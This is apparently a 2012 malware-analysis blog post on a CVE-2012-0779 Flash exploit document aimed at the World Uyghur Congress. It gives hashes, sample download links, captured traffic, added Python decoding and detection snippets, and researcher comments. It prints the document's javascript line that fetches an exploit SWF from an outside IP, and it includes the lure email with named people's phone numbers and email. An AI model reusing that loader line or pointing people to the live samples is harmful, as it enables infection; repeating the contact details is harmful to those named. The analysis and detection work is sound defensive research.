
Sunday, May 6, 2012

May 3 - CVE-2012-0779 World Uyghur Congress Invitation.doc



There are already quite a few samples of this recently patched exploit in the wild, including some targeting US companies. This particular sample targets the World Uyghur Congress, which is "an international organization aspiring to represent .. exiled Uyghur (Turkish ethnic group) people both inside and outside of the Xinjiang Autonomous Region of the People's Republic of China" (Wikipedia). The text of the email cannot be translated with online translators, but judging by the content of the attachment, it is meant to look like an invitation to the World Uyghur Assembly.

More often than not, interesting samples arrive at the wrong time, when I cannot analyze them for various reasons, such as being busy with something else. I was planning to look at this one over the weekend but it did not happen, so here it is: CVE-2012-0779. Analyze it, write signatures, add detection to your filters. If you post an analysis, please send me your link and I will add it. I will just post a few details about the file.


CVE Information




CVE-2012-0779
Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X, and Linux; before 11.1.111.9 on Android 2.x and 3.x; and before 11.1.115.8 on Android 4.x allows remote attackers to execute arbitrary code via a crafted file, related to an "object confusion vulnerability," as exploited in the wild in May 2012.




File Information

File: WUC Invitation Letter Guests.doc
Size: 121872
MD5:  1750A38A44151493B675538A1AC2070B

Download

Download 1750A38A44151493B675538A1AC2070B (email me if you need the password)
Download dropped file 6fe1634dce1d095d6b8a06757b5b6041 - thanks to Steven K

Also see here http://jsunpack.jeek.org/?report=48b3c77f602abc635f520eafb4690cc160e3acdd - thanks to C0d3inj3ct

Action Script http://pastebin.com/fbPRL3ih




Original Message

Subject: Norwegiyedin Toygha teklip qilinidighanlarning tizimligi (List of those from Norway to be invited to the celebration)
Date: Fri, 27 Apr 2012 11:46:02 +0800
To: XXXXXX

Greetings,

Yesterday Madam told me that I should meet with Dolqun about inviting Arne and his wife from the Norwegian Rafto Foundation to the congress to be held in Japan, and that Dolqun should send them an invitation letter right away. Today I met with Dolqun about this. Dolqun says that a copy of the invitation letter has been sent to Zubeyre, and besides, since Madam has to sign the invitation letter anyway, it is better that it be sent from America. So I am sending you their names (you should already have them, but just in case).

Therese Jebsen
Executive Director of the Rafto Foundation
Phone: +47 55 21 09 31
Mobile: +47 41 51 13 90
E-mail: therese.jebsen(a)rafto.no

Arne Liljedahl Lynngård

Former head of the Rafto Foundation (now a member)

Phone: 55 24 42 02

Mobile: 95 15 22 90


Created Files

Clean decoy document
JavaScript used to download the SWF:
javascript:eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000%3E%3C/embed%3E')))


swf compressed
2b98d285c8b581855d59ac368956ee78


When you uncompress it, you get:
File: essais~.swf
Size: 9162
MD5:  76700F862A0C241B8F4B754F76957BDA

Ascii Strings:
---------------------------------------------------------------------------
frame1
_&Operated by DoSWF:http://www.doswf.com  <<DoSWF - Flash Encryption
Object
EventDispatcher
flash.events
DisplayObject
flash.display
InteractiveObject
DisplayObjectContainer
Sprite
MovieClip
_doswf_package.LoadingBarBase
Security
Dropped file (I don't have this one)
MD5: 6FE1634DCE1D095D6B8A06757B5B6041 
Application Data\Macromedia\Flash Player\#SharedObjects\temp.exe
Application Data\Macromedia\Flash Player\#SharedObjects\Flash_ActiveX.exe
Application Data\conime.exe

----------
Someone sent a partial SWF analysis; I added his SWF and the decompiled Flash file to the main download zip above.
The included zip contains the second-stage SWF that is embedded in the main one,
and a copy of the decompiled script from it. The script originally had all the
functions and variables set to Unicode strings, which have been renamed
for readability. The parameters passed into the top-level SWF from the doc file:

info=789c333230d13331d53337d633b3b432313106001afa0338
infosize=00FC0000

info is the compressed host name; infosize is a variable used to configure the
shellcode and probably the offset in the parent doc file of the embedded exe.

Complete script contained in the doc file below:

eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000%3E%3C/embed%3E')))
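Here is an added Python decoder for the javascript: line above (my example, not code from the post or from the contributor who sent the SWF analysis). It strips the unescape() layer, parses the embed src URL and inflates the zlib-packed info parameter (the 78 9c prefix is the standard zlib header). Because the note above only guesses at what infosize means, the decoder returns it in both byte orders.

```python
import re
import zlib
from urllib.parse import parse_qs, unquote, urlparse

# Constructed copy of the javascript: URL from this post (same values as on the page).
LURE_JS = (
    "javascript:eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf"
    "?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000%3E%3C/embed%3E')))"
)


def decode_lure(js: str) -> dict:
    """Undo unescape(), pull the embed src URL apart and inflate the 'info' parameter."""
    m = re.search(r"unescape\('([^']*)'\)", js)
    if not m:
        raise ValueError("no unescape('...') payload found")
    html = unquote(m.group(1))  # -> "<embed src=http://.../essais.swf?info=...&infosize=...></embed>"
    src = re.search(r"<embed\s+src=(\S+?)>", html).group(1)
    u = urlparse(src)
    q = parse_qs(u.query)

    info_raw = bytes.fromhex(q["info"][0])
    # 78 9c = zlib header (deflate, default compression); refuse anything else
    if info_raw[:2] != b"\x78\x9c":
        raise ValueError("info does not look like a zlib stream")
    c2 = zlib.decompress(info_raw).decode("ascii")  # host:port the SWF is told to talk to

    infosize_raw = bytes.fromhex(q["infosize"][0])
    return {
        "swf_url": src,
        "swf_host": u.hostname,
        "swf_path": u.path,
        "c2": c2,  # "204.45.73.69:443" for the sample on this page
        "infosize_be": int.from_bytes(infosize_raw, "big"),
        "infosize_le": int.from_bytes(infosize_raw, "little"),
    }


if __name__ == "__main__":
    for k, v in decode_lure(LURE_JS).items():
        print(f"{k}: {v}")
```

Read little-endian, 00FC0000 is 0xFC00 = 64512, which does lie inside the 121872-byte document; that is consistent with the offset guess above but does not confirm it.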

File: embedded.swf  Virustotal
Size: 6246
MD5:  847A9CFF5328F85015293BAD2F164F10




Traffic


GET /essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000 HTTP/1.1
Accept: */*
User-Agent: contype
Host: 204.45.73.69

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 7993
Accept-Ranges: bytes
Content-Disposition: filename="essais.swf";
Last-Modified: Wed, 25 Apr 2012 15:42:37 GMT
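A small added detection example (mine, not from the post) that runs over the request captured above plus a constructed benign SWF request. It keys on a .swf path carrying a zlib-packed info parameter (78 01 / 78 5e / 78 9c / 78 da prefixes) and an infosize parameter; the contype User-Agent, which urlmon sends when it only probes a resource's content type, is treated as a supporting indicator rather than a match on its own.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed raw requests: the first is the GET from the capture on this page,
# the second a benign SWF fetch that must not fire.
SAMPLE_REQUESTS = [
    "GET /essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000 HTTP/1.1\r\n"
    "Accept: */*\r\nUser-Agent: contype\r\nHost: 204.45.73.69\r\n\r\n",
    "GET /player.swf?autoplay=1 HTTP/1.1\r\n"
    "Accept: */*\r\nUser-Agent: contype\r\nHost: cdn.example.test\r\n\r\n",
]

# hex of a zlib stream: CMF 0x78 followed by one of the four standard FLG bytes
ZLIB_HEX = re.compile(r"^78(01|5e|9c|da)[0-9a-f]+$", re.I)


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, lowercase-header dict)."""
    lines = raw.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def flag_request(raw: str) -> list:
    """Return the reasons this request matches the CVE-2012-0779 lure pattern ([] if none)."""
    method, target, headers = parse_request(raw)
    u = urlparse(target)
    q = parse_qs(u.query)
    reasons = []
    if method == "GET" and u.path.lower().endswith(".swf"):
        if ZLIB_HEX.match(q.get("info", [""])[0]):
            reasons.append("SWF requested with zlib-packed 'info' parameter")
        if "infosize" in q:
            reasons.append("'infosize' parameter present")
    # contype alone is benign (urlmon content-type probe), so only count it once the URL matched
    if reasons and headers.get("user-agent") == "contype":
        reasons.append("fetched via urlmon 'contype' probe, i.e. by an embedded object, not a browser")
    return reasons


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req.split("\r\n")[0], "->", flag_request(req) or "clean")
```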


Automatic scans

SWF - Virustotal

Doc
https://www.virustotal.com/file/064c0e1b9157bfcaca62c2f06abd4b51aa289c1b1678c2688b1d7f36cc1335a8/analysis/
SHA256: 064c0e1b9157bfcaca62c2f06abd4b51aa289c1b1678c2688b1d7f36cc1335a8
SHA1: 4380b5336fa03554cbc5542a7460f7cc70adc8bb
MD5: 1750a38a44151493b675538a1ac2070b
File size: 119.0 KB (121872 bytes)
File name: WUC Invitation Letter Guests.doc
File type: MS Word Document
Detection ratio: 6 / 42
Analysis date: 2012-05-07 02:08:31 UTC
BitDefender - Exploit.ScriptBridge.Gen - 20120507
F-Secure - Exploit.ScriptBridge.Gen - 20120507
GData - Exploit.ScriptBridge.Gen - 20120507
Ikarus - Exploit.ScriptBridge - 20120507
nProtect - Exploit.ScriptBridge.Gen - 20120506


11 comments:

  1. Oh, Mila, I just knew you'd be the first to post this 0779.
    NICE JOB!

  2. It seems there's no password to the ZIP?

  3. Dropped file (I don't have this one) MD5: 6FE1634DCE1D095D6B8A06757B5B6041 // got it, drop me a mail from somewhere other than Gmail, which doesn't allow archive attachments, if you want it ;)
    xylitol@malwareint.com

    Replies
    1. Steven K, can you please send the password to 'infotodo@yahoo.co.uk'

  4. Search for the network pattern "/upload/exp.swf" in Google. It will bring you to a few examples of the compressed SWF files on jsunpack.

    One instance: http://jsunpack.jeek.org/?report=48b3c77f602abc635f520eafb4690cc160e3acdd

    Even though the malicious site on which this SWF file was hosted is down, you can still download the samples from jsunpack site.

    On a side note, a few of the compressed SWF files are of version 9 and others of version 14.

  5. From the RDF MetaData of the decompressed SWF File:

    Encrypted by DoSWF
    Version:5.0.3
    Username:nxianguo1985@163.com.fr
    Index:http://www.doswf.com
    Author:http://www.laaan.cn

  6. Does anyone know how to decrypt the DoSWF encryption of the decompressed swf file? Been looking for a tool, but no luck..

  7. Hello man, do you have the ActionScript code? Please post it in the blog.

  8. How was the embedded Flash found? Since it is an encrypted Flash file, how was the shellcode even seen as part of the code? Was it taken out of memory when the Flash file was loaded? What Flash tools were used to extract the ActionScript code in the pastebin link?
